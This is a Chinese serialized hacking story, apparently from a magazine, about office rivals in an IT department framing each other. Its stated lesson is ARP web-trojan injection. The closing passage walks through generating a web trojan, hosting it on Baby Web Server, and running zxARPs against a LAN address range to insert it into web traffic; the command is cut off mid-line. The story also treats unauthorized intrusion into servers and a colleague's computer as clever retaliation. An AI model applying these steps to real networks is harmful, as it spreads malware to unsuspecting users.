毒辣辣求职记(5)——逼到悬崖边缘
安全维护
故事主角:毒辣辣
其他人物:胖哥(老资格的同事)、主任(直接领导)
本期知识点:ARP挂马攻击
故事提要:逐步冷静的毒辣辣面对胖哥的陷害,据理力争、妙语辩解,暂时化解了主任的信任危机。面对对手的咄咄逼人,毒辣辣决定针锋相对,采取措施并找出胖哥入侵主任笔记本电脑的证据,为自己讨回公道。前途是光明的,道路却总是曲折的……
戳穿阴谋
主任毕竟是老江湖了,短暂的愤怒之后,逐渐冷静下来。主任认为不能单听胖哥的一面之词,于是利用胖哥外出的时机,把毒辣辣秘密地叫到自己的办公室,想全面了解一下情况。
“毒辣辣,听说你最近很受财务室的欢迎!”
“我帮财务室的老会计解决了上网速度慢的问题……”
“就这样,没做其他的?听说你私自将公司的备用FTP服务器,改成影音下载服务器,是不是有这回事?”
毒辣辣一听主任说话的语气和话题,就感到大事不妙,自己入侵FTP服务器的事情被人打“小报告”了,可整个操作自己做得不知不觉,到底是谁出卖了自己?是老会计?不会!是紫衣MM?更不会!
冷汗从毒辣辣的额头不断往外冒,暗道:“如果今天解释不清楚,自己就完蛋了!”
“主任,其实这件事情,我一直想向你汇报,但由于你工作太忙,我还没有来得及汇报。我来公司这段时间,发现工作节奏很快,公司管理严格,很多公司员工感到沉重的压力,我感到他们的情绪比较焦躁,长此以往会出大问题的,我想我们信息中心在这方面可以发挥优势,建立一个影音点播系统,供公司员工休息时候娱乐,为大家创造一个放松的环境……”
“这样吗?”主任的手指有规律地轻轻地敲着桌子,脸上没有透露出喜怒哀乐,“毒辣辣,你觉得奇怪不,你才来我们公司,我的笔记本电脑就出问题了……你说有人在我的笔记本电脑里面建立了隐藏账号,那人是谁?你找到了吗?”
毒辣辣的心一下子又紧了,为什么主任会怀疑我?是胖哥!此时,毒辣辣一切都明白了,胖哥一定是恶人先告状,算他狠!毒辣辣深吸一口气,冲着主任微微一笑:“主任,隐藏账号的事情,你除了告诉我,没有告诉别人吧?”
“那是当然。”
“那向你告密的那人怎么知道隐藏账号的事情?这不是‘此地无银三百两’吗?再说,隐藏账号创建的时候,我还不认识你呢!”
毒辣辣一下子抓住了胖哥栽赃的破绽,主任陷入了沉思。
毒辣辣继续说道:“主任,FTP服务器的事情是我做得不对,没有及时汇报,还请你谅解。你笔记本电脑中的隐藏账号,我一定会尽快查清楚,掌握实质证据后向你汇报……”
针锋相对
听了毒辣辣的解释,主任依然毫无表情,他点点头:“你先出去吧!”
回到办公室,毒辣辣端起水杯,猛灌了一气,终于感觉不到主任的压力了,他坐下后回忆着此前的对话:“打小报告的人一定是胖哥,可为什么他知道我入了FTP服务器,他又没有千里眼。等等,难道是他在我的电脑中种植了木马?”
毒辣辣调出嗅探工具,利用该工具来分析自己电脑与外面的所有通信。很快毒辣辣就发现了一个可疑的通信,通过深入的分析,发现通信的IP地址应该是信息中心的。到此,毒辣辣彻底明白了是谁在捣鬼。
现在当务之急是揪出木马,毒辣辣在安全模式下调用杀毒软件进行全盘查杀,扫描结束后,一个病毒也没有找到,看来木马进行了免杀,逃过了杀毒软件的查杀。毒辣辣哼了一声,调出安全辅助工具,不多久就揪出了木马。
满腔怒火的毒辣辣说了一句“养鸟的居然被鸟耍了”,他调出扫描工具,输入此前查到的IP地址,进行远程分析。胖哥电脑的安全防护做得还是不错的,拦截了Ping命令,关闭了3389、445等高危端口,远程溢出工具也没有作用。
“胖哥电脑防范得如此严密,常规的入侵方法看来是不行了,我得想想其他的招!”
再遭陷害
毒辣辣还没有考虑好用什么方法入侵胖哥的电脑,又接到主任的电话,叫他去办公室。
“上午的网络视频会议因为局域网的ARP攻击而中断了几分钟,局域网内的很多电脑打开网页就报警说有网页木马,这个事情你知道吧?”
“我好像听说了,主任需要我去调查ARP攻击源吗?”
“不用了,ARP攻击源已经找到了,是你的电脑,你自己看看吧!”
毒辣辣接过分析报告,一看大惊失色,ARP攻击源的IP地址就是自己电脑的,可自己明明没有发动过ARP攻击。毒辣辣看到分析报告末尾的署名,顿时明白是胖哥又一次在陷害自己。
原来,上午,胖哥找了一个借口支开了毒辣辣一小会,然后选择了一个网页木马生成器,制作了一个网页木马,将网页木马偷偷传入毒辣辣的电脑中,然后在毒辣辣电脑中准备开启HTTP服务。
胖哥下载了一款Web服务器软件Baby Web Server,点击“服务→设置”, 在“网页目录”中添加网页木马位置,再点击“Start”开启HTTP服务。做到这里还没有完,胖哥远程传入ARP欺骗工具zxARPs,然后进入zxARPs目录输入命令:zxARPs.exe -idx 0 -ip 192.168.4.7-192.168.4.222 -port 80 -insert \"